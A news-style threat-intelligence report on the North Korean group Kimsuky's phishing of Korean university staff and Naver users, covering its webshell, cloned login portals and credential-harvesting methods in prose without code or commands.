Kimsuky, a North Korean APT group, has been identified as utilizing targeted phishing campaigns and exploiting DMARC to conceal their social engineering tactics. Their main goal is to infiltrate university networks and steal research data for the Reconnaissance General Bureau. This aligns with North Korea’s strategic objective of acquiring intelligence to enhance their scientific capabilities, a pattern seen in previous incidents involving the theft of nuclear, healthcare, and pharmaceutical research data.
The recent exposure of Kimsuky’s operational security vulnerabilities has shed light on their tactics and underscores the persistent threat posed by this cyber espionage group. It has come to light that Kimsuky uses compromised internet hosts like audko and dorray as staging grounds for their attacks. They deploy a webshell known as “Green Dinosaur,” derived from the Indrajith Mini Shell 2.0, on these compromised systems. This webshell, which is specifically designed for evasion, allows remote operators to upload, download, rename, and delete files, facilitating the creation of phishing websites.
Kimsuky has been observed creating phishing pages that mimic authentic university login portals, with a specific focus on Dongduk, Korea, and Yonsei universities. These pages are modified to capture login credentials, bypass encryption protocols, and redirect victims to a decoy PDF hosted on Google Drive. The PDF, disguised as an invitation to the Asan Institute for Policy Studies August Forum, serves as a social engineering tactic to build trust with victims.
The group utilizes a PHP script to log username, password, and login attempts, enabling them to steal credentials from unsuspecting victims. By injecting malicious code into legitimate login pages that closely resemble the actual university portals, Kimsuky is able to capture sensitive information. The attack on Korea University alters Javascript to capture user input, while the attack on Yonsei University modifies HTML for the same purpose. Both attacks redirect stolen credentials to genuine login pages to avoid immediate detection.
In addition to targeting university accounts, Kimsuky leverages a generic phishing toolkit to target Naver accounts. This toolkit acts as a proxy similar to Evilginx, capturing cookies and credentials from users who fall victim to their deceptive tactics. By using a custom PHPMailer implementation called “SendMail” hosted on GreenDinosaur, the attackers compromised a Seoul National University professor’s email account to gain access to a South Korean SMTP server for Dooray CRM.
According to Resilience, Kimsuky targeted employees at Dongduk, Korea, and Yonsei Universities by exploiting accounts with identical credentials and recovery emails. The attackers used a SendMail server to distribute Naver-themed phishing emails through compromised Gmail and Daum accounts. These malicious emails, which falsely claim Naver account deletion or email restrictions, direct victims to multiple phishing websites.
The exposure of Kimsuky’s tactics highlights the ongoing threat posed by this North Korean cyber espionage group and emphasizes the need for enhanced cybersecurity measures to protect against such attacks. University networks and research institutions must remain vigilant and continually update their defenses to mitigate the risk of falling prey to sophisticated phishing campaigns orchestrated by groups like Kimsuky.